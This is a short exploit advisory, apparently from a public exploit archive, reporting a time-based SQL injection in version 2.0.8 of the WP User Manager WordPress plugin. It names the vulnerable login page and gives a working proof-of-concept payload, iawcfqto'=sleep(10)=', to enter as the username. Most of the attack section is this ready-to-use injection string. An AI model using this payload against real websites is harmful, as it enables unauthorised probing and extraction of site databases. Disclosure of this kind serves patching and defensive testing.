WordPress WP User Manager 2.0.8 SQL Injection

WordPress WP User Manager plugin version 2.0.8 suffers from a remote time-based SQL injection vulnerability.


MD5 | b23aa52bd9caaf0ef1b7daec59bcbab1


====================================================================
WP User Manager v2.0.8 (WordPress Plugin) - Time-Based SQL Injection
====================================================================

____________________________________________________________________________________


# Exploit Title: WP User Manager v2.0.8 (WordPress Plugin) - Time-Based SQL Injection

# Date: [11-09-2018]

# Category: Webapps

____________________________________________________________________________________


# Author: Socket_0x03 (Alvaro J. Gene)

# Email: Socket_0x03 (at) teraexe (dot) com

# Website: www.teraexe.com

____________________________________________________________________________________


# Software Link: https://wordpress.org/plugins/wp-user-manager

# Plugin: WP User Manager

# Version: v2.0.8 (last version)

# File: login

# Input: username

# Language: This application is available in English language.

# Plugin Description: A WordPress plugin to create user profiles with registration,
login, password recovery, and other features.

____________________________________________________________________________________


# Time-Based SQL Injection:

http://www.website.com/wordpress/index.php/login
Username: iawcfqto'=sleep(10)='
Password: password
Click on Login


Related Posts